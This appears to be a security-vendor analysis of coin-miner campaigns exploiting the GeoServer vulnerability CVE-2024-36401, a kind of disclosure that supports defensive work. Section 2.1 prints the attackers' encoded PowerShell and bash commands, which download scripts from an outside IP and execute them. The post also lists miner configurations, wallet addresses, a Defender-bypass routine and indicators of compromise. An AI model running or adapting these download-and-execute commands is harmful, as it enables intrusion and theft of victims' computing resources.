GeoServer, Where Various CoinMiner Attacks Occur

AhnLab SEcurity intelligence Center (ASEC) previously covered the case of threat actors exploiting the GeoServer vulnerability to install CoinMiner and NetCat through the “CoinMiner Attacks Exploiting GeoServer Vulnerability” blog. [1] The threat actors have been continuously targeting vulnerable GeoServers to install CoinMiner. This post will cover the identified cases of CoinMiner installation.

 

1. GeoServer

GeoServer is an open-source Geographic Information System (GIS) server written in Java and is a platform that supports geographic and spatial data processing capabilities. A vulnerability (CVE-2024-36401) was disclosed in 2024 that allowed unauthorized users to execute remote code, and threat actors have since been exploiting this vulnerability to install malware.

In September 2024, Fortinet disclosed attack cases where threat actors exploited the CVE-2024-36401 vulnerability to distribute malware strains such as GOREVERSE, SideWalk, Mirai, Condi, and CoinMiner. [2] Additionally, Trend Micro also published the attack campaigns of Earth Baxia threat actor. It was reported that the threat actor exploited the CVE-2024-36401 vulnerability for spear-phishing attacks against local organizations in Taiwan. [3]

While the specific details of how the threat actors exploited the vulnerability are unknown, the fact that the attacks targeted environments with vulnerable versions of GeoServer suggests that the threat actors exploited known vulnerabilities.

 

2. Cases of CoinMiner Attacks

2.1. Type A

Type A is the same threat actor introduced in a previous blog post, and the same wallet address is being used. The threat actor exploited vulnerable GeoServers to execute the following PowerShell commands and utilized “bash.exe” to run Bash scripts.

> powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMgAyADAALgA4ADQALgAxADAANwAuADYAOQAvAGoAcwAvAGcAdwAuAHQAeAB0ACcAKQA=
> bash -c {echo,Y3VybCAtZnNTTCBodHRwOi8vMjIwLjg0LjEwNy42OS9qcy9nbC50eHQgfHNoCg==}|{base64,-d}|{bash,-i}

The malware strains, including XMRig CoinMiner, are uploaded to the following addresses and are downloaded and installed by Batch malware “gw.txt” or Bash malware “gl.txt”. The installation process of CoinMiner for Windows and Linux is the same as before, and only the malware and download addresses have changed.

Figure 1. URL where the malware was uploaded

• url – 1 : pool.supportxmr[.]com:443
• url – 2 : 104.243.43[.]115:443
• user : “47DsNc5pK8rYBQF4ev3mNBct3tkkHuUmxeqCSSbX3YuBhXweSB9XeQbcPMqEBaSJy4bGrPxbdMJkphrVQ5AmastoEMpSjcU
• pass : “x

Additionally, the same threat actor is also distributing CoinMiner to WegLogic servers. It appears that they are installing CoinMiner when they scan the systems exposed to the outside world and find vulnerable services.

> powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAxADkALgAxADkANAAuADEANQAzAC4AMwAxADoAOAAwADgAMAAvAGkAYwBvAG4ALwBqAHMALwB3AGkALgB0AHgAdAAnACk

Figure 2. CoinMiner installation command executed by the WegLogic service

• url – 1 : pool.supportxmr[.]com:80
• user : “47KoSaQXtpZ2AypuUm6pBgfUjfUuS1Fiy2jJRajdztpzGHrtLk3qPtQExCMd9PuRkBWPU4tDfoT7jXnYJPyEpDiF6qNuR7R
• pass : “x

 

2.2. Type B

Another threat actor installed malware using the certutil command. The initially installed malware is a RAR SFX format dropper that contains XMRig and configuration information.

Figure 3. Malware installation behavior using certutil

Upon execution, the malware installs other malware strains in the “C:\Program Files\Java\jre1.9.2_251” directory and then executes “3.bat”. “3.bat” uses NSSM to execute “java.exe”, which is actually XMRig, disguised as “javaws.exe” located in the “bin” folder.

Figure 4. Internal files of the Dropper malware

Additionally, XMRig is created by the threat actor themselves and does not use additional configuration files like “config.json”, but instead contains the configuration data internally. “javap.exe” is a loader that reads and decrypts the “hello.dat” file in the same path before executing it in the memory. The decrypted file is XMRig, which includes configuration information such as the mining pool URL like the previous type.

Figure 5. Configuration information included in XMRig

• url – 1 : ssl.aaaaaaaa[.]cyou:9655
• url – 2 : ssl.aaaaaaaa[.]cyou:9654
• url – 3 : xmr.aaaaaaaa[.]cyou:1110
• url – 4 : aaaaaaaa[.]cyou:443
• url – 5 : asia.aaaaaaaa[.]cyou:1110
• url – 6 : us.aaaaaaaa[.]cyou:1110
• url – 7 : eu.aaaaaaaa[.]cyou:1110
• user : “45PX6QS4EhgRC1YbPNPRz8GmhyF7N4WVxQssZnhhc7xodKNNrQiEqxz9uQEMD6e8isjHVHt3Vk9Nqh5HMRgjVw4RC61FY5W
• pass – 1 : “x1999
• pass – 2 : “x

 

2.3. Type C

The last threat actor is known for using not only CoinMiner, but also for installing AnyDesk and using a self-developed downloader. However, as of now, the download link is not available, so it is unknown what payload was downloaded.

The threat actor installed the “setupcache.bat” Batch malware, which is responsible for installing XMRig by executing PowerShell commands through GeoServer. Additionally, while “Setup_AnyDesk.bat” was not found, it can be assumed from the name that it is a Batch script to install AnyDesk.

setupcache.bat downloads a compressed file “caches.zip” which includes 7z, NSSM, and XMRig. It then decompresses the file using 7z and installs XMRig as a service using NSSM. Note that in various attack cases, at least 5 download URLs have been identified, and the compressed file has been named not only “caches.zip” but also “cache.zip,” “w3wp.zip,” and “iis.zip.”

Figure 6. Batch malware responsible for the downloader feature

They also attempted to install their own custom-made downloader malware, “systemd,” and add an exception path to Windows Defender and disable it. The downloader is responsible for downloading payloads from the C&C server and executing them in memory. However, as of the time of analysis, the download was not possible, so the information on the final malware is unknown.

Figure 7. Routine of bypassing Windows Defender and installing the downloader

• url – 1 : www[.]combilke[.]top:9200
• url – 2 : www[.]combilkee[.]top:9200
• url – 3 : www[.]cloudsecure[.]top:9200
• url – 4 : 154.89.152[.]204:9200
• url – 5 : 203.91.76[.]58:9200
• user : “49Qp2aEzUdEANd88muJEvDVKEzn9xbm5xEXjZ8QUeN1ndVxvtUuSjZAecFJHabrzYE2VXTu5sZM8H5GiKfKah1VJBwuWhYc
• pass – 1 : “k2_7
• pass – 2 : “k2_2

Figure 8. Downloader malware

 

3. Conclusion

Since the remote code execution vulnerability (CVE-2024-36401) of GeoServer was disclosed, cases of threat actors exploiting this vulnerability to install malware are still being identified. Threat actors are targeting environments where GeoServer is installed and are installing various coin miners. When a coin miner is installed, the threat actor uses the system resources to mine Monero coins. The threat actor can then use NetCat, which is installed together with the coin miner, to install other malware or steal information from the system.

 

MD5

04101ba4061732ed0716f554cb7d6539

05fe0e7e4e181ee77749f334e2d7b10f

1136efb1a46d1f2d508162387f30dc4d

21c5171fb746b93913efdaac328d91bd

2517826a165193105923233e13b418d4

URL

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/config[.]json

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/l[.]txt

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/p[.]sh

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/s[.]rar

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/solrd[.]exe

FQDN

aaaaaaaa[.]cyou

asia[.]aaaaaaaa[.]cyou

eu[.]aaaaaaaa[.]cyou

ssl[.]aaaaaaaa[.]cyou

us[.]aaaaaaaa[.]cyou

IP

104[.]243[.]43[.]115

154[.]89[.]152[.]204

185[.]208[.]156[.]197

203[.]91[.]76[.]58